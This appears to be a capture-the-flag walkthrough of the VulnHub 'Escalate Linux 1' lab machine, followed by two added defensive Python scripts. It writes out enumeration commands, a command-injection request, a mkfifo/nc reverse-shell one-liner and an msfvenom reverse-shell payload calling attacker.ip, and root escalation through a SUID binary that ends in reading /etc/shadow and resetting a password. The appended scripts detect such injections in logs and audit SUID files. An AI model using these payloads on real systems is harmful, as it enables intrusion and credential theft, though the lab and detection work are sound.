Vulnerable Test Machine
-----------------------

Escalate Linux 1: https://www.vulnhub.com/entry/escalate_linux-1,323/

# Host discovery and service enumeration
kali$ ifconfig
kali$ netdiscover
kali$ nmap -sC -sV -A target.ip -o escalateLinux
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 12:43 EDT
Nmap scan report for target.ip
Host is up (0.0014s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f2:23:ad:4e:91:4a:4e:0b:68:58:bb:c4:1b:a1:cd:2a (RSA)
|   256 14:25:d6:0f:cb:51:51:bd:27:c6:db:9f:f0:c0:65:7c (ECDSA)
|_  256 17:71:af:fb:5c:e2:7c:ea:ef:ef:75:d7:de:ba:b3:63 (ED25519)
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35711/tcp   mountd
|   100005  1,2,3      37628/udp6  mountd
|   100005  1,2,3      39404/udp   mountd
|   100005  1,2,3      51303/tcp6  mountd
|   100021  1,3,4      35421/tcp6  nlockmgr
|   100021  1,3,4      38613/tcp   nlockmgr
|   100021  1,3,4      52981/udp   nlockmgr
|   100021  1,3,4      57060/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs         3-4 (RPC #100003)
MAC Address: 08:00:27:36:AA:E6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|   date: 2025-03-29T16:43:34
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2025-03-29T12:43:34-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   1.36 ms target.ip

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.43 seconds

# SMB enumeration: the share is listed but guest access is denied
kali$ smbclient -L target.ip

        Sharename       Type      Comment
        ---------       ----      -------
        liteshare       Disk
        IPC$            IPC       IPC Service (Linux Lite Shares)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LINUX

kali$ smbclient //target.ip/liteshare
Password for [WORKGROUP\root]:
tree connect failed: NT_STATUS_ACCESS_DENIED

# Web content discovery
kali$ dirb http://target.ip/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 29 12:48:30 2025
URL_BASE: http://target.ip/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://target.ip/ ----
+ http://target.ip/index.html (CODE:200|SIZE:10918)
+ http://target.ip/server-status (CODE:403|SIZE:301)

-----------------
END_TIME: Sat Mar 29 12:48:42 2025
DOWNLOADED: 4612 - FOUND: 2

kali$ gobuster dir -u http://target.ip/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://target.ip/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 292]
/shell.php            (Status: 200) [Size: 29]
Progress: 12216 / 441122 (2.77%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 12247 / 441122 (2.78%)
===============================================================
Finished
===============================================================

# Command Injection Discovered
kali$ curl http://target.ip/shell.php
/*pass cmd as get parameter*/

# Command Injection
kali$ curl http://target.ip/shell.php?cmd=id
uid=1005(user6) gid=1005(user6) groups=1005(user6)
/*pass cmd as get parameter*/

# Set Server for Reverse Shell Connection
kali$ nc -nvlp 444
listening on [any] 444 ...

# URL encode the injection payload and send injection attack via curl
# rm -f /tmp/backpipe && mkfifo /tmp/backpipe && cat /tmp/backpipe | /bin/bash -i 2>&1 | nc attacker.ip 4444 > /tmp/backpipe
kali$ curl "http://target.ip/shell.php?cmd=<URL-encoded payload from the line above>"

# Successful Connection
kali$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [attacker.ip] from (UNKNOWN) [target.ip] 41130
bash: cannot set terminal process group (916): Inappropriate ioctl for device
bash: no job control in this shell

Welcome to Linux Lite 4.4

Saturday 29 March 2025, 13:28:32
Memory Usage: 355/985MB (36.04%)
Disk Usage: 6/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)

user6 / | var | www | html  ls
index.html  shell.php
user6 / | var | www  cd ~
user6 / | home | user6  ls
user6 / | home | user6  cd ..
user6 / | home  ls
user1  user2  user3  user4  user5  user6  user7  user8
user6 / | home  cd ../user1
user1 / | home | user1  ls
user6 / | home | user1  cd ../user2
user6 / | home | user2  ls
user6 / | home | user2  cd ../user3
user6 / | home | user3  ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  shell
user6 / | home | user3  ls -la shell
-rwsr-xr-x 1 root root 8392 Jun  4  2019 shell
user6 / | home | user3  id
uid=1005(user6) gid=1005(user6) groups=1005(user6)

# Privilege escalation: root-owned SUID binary in user3's home drops a root shell
user6 / | home | user3  ./shell
You Can't Find Me
bash: cannot set terminal process group (916): Inappropriate ioctl for device
bash: no job control in this shell

Welcome to Linux Lite 4.4
You are running in superuser mode, be very careful.

Saturday 29 March 2025, 13:56:51
Memory Usage: 362/985MB (36.75%)
Disk Usage: 6/217GB (3%)

root / | home | user3  id
uid=0(root) gid=0(root) groups=0(root),1005(user6)
root / | home | user3  cat /etc/shadow
[/etc/shadow output omitted]

# Change user1's password
root / | home | user3  sudo echo "user1:userp" | chpasswd
root / | home | user3  echo "user1:user1" | sudo chpasswd

-- OR --

# Set Server for Reverse Shell Connection
kali$ nc -nvlp 4444
listening on [any] 4444 ...
# Create reverse shell payload
kali$ msfvenom -p cmd/unix/reverse_python lhost=attacker.ip lport=4444 raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 364 bytes
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqVkd8LgjAQx/8V2dMGceoYUcQeJAwiKkjfJddCybbh6f8fMiOYT93LcT8+3/vCtW9n+yFCq156iHys5oxj7XqrNGIwsHNjF32jsThIkm45pOsNJMC5IOHOdEgKIcI+Sn8dfKJzlR2q4yUvQ09+WFz3p6oob3l2Zgs9UNYYrQZKJ1uBwOSCLRiL8BgdpwjPttPGUhZgyf9I+j/CF4iTvy+AuncdJXHdmhgbwj51Q2Yx')[0])))"

# URL encode the injection payload and send injection attack via curl
kali$ curl "http://target.ip/shell.php?cmd=<URL-encoded msfvenom payload from above>"

kali$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [attacker.ip] from (UNKNOWN) [target.ip] 41134
ls
index.html
shell.php
bash -i
bash: cannot set terminal process group (916): Inappropriate ioctl for device
bash: no job control in this shell

Welcome to Linux Lite 4.4

Saturday 29 March 2025, 13:50:22
Memory Usage: 360/985MB (36.55%)
Disk Usage: 6/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)

user6 / | var | www | html

# Add a check for non-interactive sessions
# Before any output-generating commands (like echo or date) in .bashrc, add the
# following check so that they are only executed in interactive shells:
kali$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa user1@target.ip
export TERM=xterm
nano ~/.bashrc
kali$ nano /home/user1/.bashrc

if [[ -z "$PS1" ]]; then
    return
fi
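The shell.php?cmd= injection above is easy to spot in the web server's own logs once the parameter is URL-decoded. The script below is an added example, not code from the write-up: it parses Apache access-log lines, decodes the cmd value (including double encoding) and flags values that look like shell commands. The log lines and the client IPs are constructed; the shell.php path and the cmd parameter name are the ones from the write-up.

```python
# Added example, not code from the write-up: triage Apache access-log lines for
# command injection through the shell.php?cmd= parameter found on this box.
# The log lines (and client IPs) are constructed; the third one carries the
# start of the URL-encoded mkfifo/nc payload the write-up sends with curl.
import re
from urllib.parse import parse_qs, unquote, urlparse

# Common Log Format: ip ident user [time] "method url proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Values that look like a command rather than a harmless parameter: known
# binaries at a token boundary, shell metacharacters, or /tmp and /bin paths.
SUSPICIOUS = re.compile(
    r"(?:^|[\s;&|])(?:id|whoami|nc|ncat|bash|sh|python\d?|mkfifo|rm|cat)\b"
    r"|[;|`$]|&&|/tmp/|/bin/")

SAMPLE_LOG = """\
10.0.0.5 - - [29/Mar/2025:12:50:01 -0400] "GET /index.html HTTP/1.1" 200 10918
10.0.0.5 - - [29/Mar/2025:13:20:10 -0400] "GET /shell.php?cmd=id HTTP/1.1" 200 62
10.0.0.5 - - [29/Mar/2025:13:28:30 -0400] "GET /shell.php?cmd=%72%6d%20%2d%66%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65%20%26%26%20%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%62%61%63%6b%70%69%70%65 HTTP/1.1" 200 0
10.0.0.9 - - [29/Mar/2025:13:30:00 -0400] "GET /shell.php?cmd=hello HTTP/1.1" 200 29
"""

def decode_cmd(url):
    """Return the fully URL-decoded cmd query value, or None if absent."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    if "cmd" not in qs:
        return None
    value = qs["cmd"][0]          # parse_qs already decoded one layer
    for _ in range(3):            # peel double/triple encoding used to dodge filters
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injections(log_text):
    """Return [(client ip, decoded cmd)] for requests whose cmd looks like a shell command."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = decode_cmd(m.group("url"))
        if cmd is not None and SUSPICIOUS.search(cmd):
            hits.append((m.group("ip"), cmd))
    return hits

if __name__ == "__main__":
    for ip, cmd in find_injections(SAMPLE_LOG):
        print(f"{ip} -> {cmd!r}")
```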
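The root shell came from a root-owned set-UID binary sitting in a user's home directory (/home/user3/shell, -rwsr-xr-x). As an added example that is not part of the write-up, this script enumerates set-UID files and flags root-owned ones outside the usual system locations or with world-writable bits; the list of system-directory prefixes is an assumption to be tuned to the host's baseline.

```python
# Added example, not code from the write-up: enumerate set-UID executables and
# flag the pattern that gave root on this box, a root-owned SUID binary under a
# user's home (/home/user3/shell, -rwsr-xr-x). The "system directory" prefixes
# are an assumption; adjust them to the baseline of the host being audited.
import os
import stat
import sys

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib", "/snap/")
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")

def find_suid(root="/"):
    """Return (path, owner uid, permission bits) for every regular file with set-UID under root."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)       # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return found

def is_suspicious(path, uid, mode):
    """Root-owned SUID outside the system prefixes, or world-writable anywhere, is a finding."""
    if uid != 0:
        return False        # non-root SUID deserves a look but is not a root-escalation path
    return not path.startswith(SYSTEM_PREFIXES) or bool(mode & stat.S_IWOTH)

if __name__ == "__main__":
    for path, uid, mode in find_suid(sys.argv[1] if len(sys.argv) > 1 else "/"):
        tag = "SUSPICIOUS" if is_suspicious(path, uid, mode) else "baseline"
        print(f"{tag:10} {mode:04o} uid={uid} {path}")
```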